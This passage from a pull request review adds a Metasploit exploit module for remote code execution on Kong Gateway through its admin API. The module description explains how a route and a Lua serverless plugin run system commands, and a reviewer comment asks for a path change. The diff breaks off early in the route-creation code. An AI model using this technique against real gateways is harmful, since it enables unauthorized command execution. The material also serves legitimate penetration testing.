modules/exploits/multi/http/kong_gateway_admin_api_rce.rb

```diff
@@ -0,0 +1,138 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name' => 'Kong Gateway Admin API Remote Code Execution',
+      'Description' => '
+        This module uses the Kong admin API to create a route and a serverless function plugin that is associated with
+        the route. The plugin runs Lua code and is used to run a system command using os.execute(). After execution the
+        route is deleted, which also deletes the plugin.',
+      'License' => MSF_LICENSE,
+      'Author' => ['Graeme Robinson'],
+      'References' =>
+      [
+        ['URL', 'https://konghq.com/'],
+        ['URL', 'https://github.com/Kong/kong'],
+        ['URL', 'https://docs.konghq.com/hub/kong-inc/serverless-functions/']
+      ],
+      'Platform' => %w[linux macos],
+      'Arch' => [ARCH_X86, ARCH_X64],
+      'Targets' =>
+      [[
+        'Unix (In-Memory)',
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Type' => :unix_memory
+      ]],
+      'Privileged' => false,
+      'DisclosureDate' => 'Oct 13 2020',
+      'DefaultOptions' => { 'RPORT' => 8001 },
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+      }
+    ))
+    register_options(
+      [
+        OptString.new('PUBLIC-API-RHOST', [false, 'The host where the public API is available, if different to RHOST']),
+        OptInt.new('PUBLIC-API-RPORT', [true, 'The port where the public API is available', 8000])
+      ],
+      self.class
+    )
+  end
+
+  def check_response(response, expected, path, description)
+    fail_with(Failure::Unreachable, "No response received from #{path} when #{description}") unless response
+    return if response.code == expected
+
+    fail_with(Failure::UnexpectedReply,
+              "Unexpected response from #{path} when #{description} (received #{response.code}, expected #{expected})")
+  end
+
+  def create_route
+    path = normalize_uri('routes')
```

Comment:
all of your `normalize_uri` calls will now become `normalize_uri(target_uri.path,` then the path.

Reply:
Done